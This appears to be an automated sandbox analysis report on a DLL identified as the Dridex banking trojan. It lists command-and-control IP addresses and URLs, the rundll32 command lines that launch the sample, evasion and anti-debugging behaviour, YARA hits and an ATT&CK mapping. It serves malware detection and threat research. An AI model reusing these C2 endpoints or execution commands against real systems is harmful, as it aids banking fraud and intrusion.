Source: loaddll32.exe, 00000001.00000003.496375711.0000000000F00000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/l
Source: loaddll32.exe, 00000001.00000003.496375711.0000000000F00000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.754463797.0000000004B53000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/ography
Source: loaddll32.exe, 00000001.00000002.809608295.0000000000F79000.00000004.00000020.sdmp	String found in binary or memory: https://193.244.140.214:808/
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96/
Source: loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.443284456.0000000004B53000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/
Source: rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/:
Source: rundll32.exe, 00000008.00000003.733323810.0000000004B54000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/Microsoft
Source: rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/V
Source: rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/graphy
Source: rundll32.exe, 00000008.00000003.437131039.00000000009DA000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/h
Source: loaddll32.exe, 00000001.00000003.652716297.0000000000F3F000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/l

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E7B39F9 InternetReadFile,

1_2_6E7B39F9

Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:50138 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:50145 version: TLS 1.2

Source: loaddll32.exe, 00000001.00000002.808902264.0000000000ECB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 11.3.rundll32.exe.4c2db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2a3db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.rundll32.exe.342db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.rundll32.exe.4c2db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6e780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.6e780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.bfdb55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.7ddb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.bfdb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2a3db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.7ddb55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.rundll32.exe.342db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.380069490.00000000007C0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.811984821.000000006E781000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.411070931.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.382887788.0000000002A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.416855290.0000000004C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418389424.0000000000BE0000.00000040.00000001.sdmp, type: MEMORY

Detected Dridex e-Banking trojan

Show sources

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E7851A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,

1_2_6E7851A7

Source: SecuriteInfo.com.Variant.Razy.980776.18296.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7967C8	1_2_6E7967C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E799E70	1_2_6E799E70
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79A660	1_2_6E79A660
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A7660	1_2_6E7A7660
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A2E60	1_2_6E7A2E60
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A1240	1_2_6E7A1240
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A0220	1_2_6E7A0220
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7AD620	1_2_6E7AD620
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E78CA10	1_2_6E78CA10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7AFA10	1_2_6E7AFA10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79B6F0	1_2_6E79B6F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E798EF0	1_2_6E798EF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A62F0	1_2_6E7A62F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79F6E0	1_2_6E79F6E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E786AD0	1_2_6E786AD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7996D0	1_2_6E7996D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A3EC0	1_2_6E7A3EC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7AFA10	1_2_6E7AFA10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E798AB0	1_2_6E798AB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A26B0	1_2_6E7A26B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A1EB0	1_2_6E7A1EB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79AE80	1_2_6E79AE80
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E795B60	1_2_6E795B60
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79BF50	1_2_6E79BF50
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A1730	1_2_6E7A1730
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A9B10	1_2_6E7A9B10
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A3B00	1_2_6E7A3B00
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79E3F0	1_2_6E79E3F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7983C0	1_2_6E7983C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E797FC0	1_2_6E797FC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A7FC0	1_2_6E7A7FC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79D030	1_2_6E79D030
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A1020	1_2_6E7A1020
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7998DA	1_2_6E7998DA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E78ACD0	1_2_6E78ACD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79A0D0	1_2_6E79A0D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7988C0	1_2_6E7988C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E798CC0	1_2_6E798CC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A5CB0	1_2_6E7A5CB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79E0A0	1_2_6E79E0A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A4CA0	1_2_6E7A4CA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A50A0	1_2_6E7A50A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7ADCA0	1_2_6E7ADCA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E781570	1_2_6E781570
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E797564	1_2_6E797564
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A89F0	1_2_6E7A89F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7A71F0	1_2_6E7A71F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79FDD0	1_2_6E79FDD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E78F9A0	1_2_6E78F9A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79C590	1_2_6E79C590
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E79D980	1_2_6E79D980
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7AD180	1_2_6E7AD180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E7CE210	8_2_6E7CE210

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7922A0 NtDelayExecution,		1_2_6E7922A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E7ABE30 NtClose,		1_2_6E7ABE30

Source: SecuriteInfo.com.Variant.Razy.980776.18296.dll

ReversingLabs: Detection: 39%

Source: SecuriteInfo.com.Variant.Razy.980776.18296.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Bluewing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Earth
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Masterjust
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Bluewing	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Earth	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Masterjust	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal84.bank.troj.evad.winDLL@11/1@0/4

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Bluewing

Source: SecuriteInfo.com.Variant.Razy.980776.18296.11433

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Variant.Razy.980776.18296.dll

Static file information: File size 1375232 > 1048576

Source: SecuriteInfo.com.Variant.Razy.980776.18296.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Variant.Razy.980776.18296.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,

1_2_6E7851A7

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E793930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

1_2_6E793930

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E7ACEF8 FindFirstFileExW,

1_2_6E7ACEF8

Source: loaddll32.exe, 00000001.00000003.496395445.0000000000F30000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: loaddll32.exe, 00000001.00000003.496375711.0000000000F00000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW8f

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_6E7F97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,

8_2_6E7F97B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_6E7F8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,

8_2_6E7F8B60

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E7F47C0 mov ecx, dword ptr fs:[00000030h]	8_2_6E7F47C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E8CBA72 mov eax, dword ptr fs:[00000030h]	8_2_6E8CBA72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E8CB64D push dword ptr fs:[00000030h]	8_2_6E8CB64D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E8CB942 mov eax, dword ptr fs:[00000030h]	8_2_6E8CB942

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E796C50 KiUserExceptionDispatcher,LdrLoadDll,

1_2_6E796C50

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E797A60 RtlAddVectoredExceptionHandler,		1_2_6E797A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_6E7C63A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		8_2_6E7C63A0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.77.0.96 235	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.56.219.47 180	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.46.210.220 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 143.244.140.214 40	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.810103930.0000000001550000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.811286564.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.810103930.0000000001550000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.811286564.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.810103930.0000000001550000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.811286564.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.810103930.0000000001550000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.811286564.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E811E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E811F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,	8_2_6E812750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_6E7FBC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E811DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E7FB0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_6E812960

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E792980 GetUserNameW,

1_2_6E792980

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Process Injection112	Input Capture1	Security Software Discovery21	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rundll321	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery23	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Razy.980776.18296.dll	3%	Virustotal		Browse
SecuriteInfo.com.Variant.Razy.980776.18296.dll	39%	ReversingLabs	Win32.Infostealer.Dridex

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://185.56.219.47:8116/ad=	0%	Avira URL Cloud	safe
https://143.244.140.214:808/9%	0%	Avira URL Cloud	safe
https://192.46.210.220/aenh.dll	0%	Avira URL Cloud	safe
https://192.46.210.220/ig$	0%	Avira URL Cloud	safe
https://192.46.210.220/?g	0%	Avira URL Cloud	safe
https://143.244.140.214:808/5	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/	0%	URL Reputation	safe
https://192.46.210.220/Certification	0%	URL Reputation	safe
https://192.46.210.220/6g	0%	Avira URL Cloud	safe
https://45.77.0.96/	0%	URL Reputation	safe
https://143.244.140.214:808/#	0%	Avira URL Cloud	safe
https://143.244.140.214:808/%	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/4ad=	0%	Avira URL Cloud	safe
https://143.244.140.214:808/l9%	0%	Avira URL Cloud	safe
https://185.56.219.47/#	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/r	0%	Avira URL Cloud	safe
https://143.244.140.214:808/ad=	0%	Avira URL Cloud	safe
https://192.46.210.220/Wfv	0%	Avira URL Cloud	safe
https://192.46.210.220/#g	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/h	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/l	0%	Avira URL Cloud	safe
https://143.244.140.214:808/ll	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/4ti	0%	Avira URL Cloud	safe
https://192.46.210.220/	0%	URL Reputation	safe
https://143.244.140.214:808/zyJ	0%	Avira URL Cloud	safe
https://182.46.210.220/	0%	Avira URL Cloud	safe
https://192.46.210.220/%	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/soft	0%	URL Reputation	safe
https://192.46.210.220/1	0%	Avira URL Cloud	safe
https://143.244.140.214:808/la	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/ll	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/nd.	0%	Avira URL Cloud	safe
https://143.244.140.214/	0%	URL Reputation	safe
https://143.244.140.214:808/My	0%	URL Reputation	safe
https://185.56.219.47/	0%	URL Reputation	safe
https://192.46.210.220/(g	0%	Avira URL Cloud	safe
https://192.46.210.220/D	0%	Avira URL Cloud	safe
https://192.46.210.220/L	0%	Avira URL Cloud	safe
https://192.46.210.220/E	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/f	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/V	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/e	0%	Avira URL Cloud	safe
https://143.244.140.214:808/b	0%	Avira URL Cloud	safe
https://143.244.140.214:808/ll9%	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/graphy	0%	URL Reputation	safe
https://143.244.140.214:808/	0%	URL Reputation	safe
https://45.77.0.96:6891/	0%	URL Reputation	safe
https://143.244.140.214/f	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/Bd	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/0	0%	Avira URL Cloud	safe
https://192.46.210.220/V	0%	Avira URL Cloud	safe
https://192.46.210.220/aenh.dllU	0%	Avira URL Cloud	safe
https://192.46.210.220/_	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/Vdv	0%	Avira URL Cloud	safe
https://192.46.210.220/ography	0%	URL Reputation	safe
https://192.46.210.220/aenh.dllltb	0%	Avira URL Cloud	safe
https://193.244.140.214:808/	0%	Avira URL Cloud	safe
https://143.244.140.214:808/~	0%	Avira URL Cloud	safe
https://192.46.210.220/1g	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/Microsoft	0%	URL Reputation	safe
https://192.46.210.220//)	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/:	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/H	0%	Avira URL Cloud	safe
https://192.46.210.220/Nf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://192.46.210.220/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://185.56.219.47:8116/ad=	loaddll32.exe, 00000001.00000003.616066058.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/9%	loaddll32.exe, 00000001.00000003.760088431.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/aenh.dll	loaddll32.exe, 00000001.00000003.760088431.0000000000F3F000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/ig$	loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/?g	loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/5	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.460682541.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.809865827.00000000009DA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
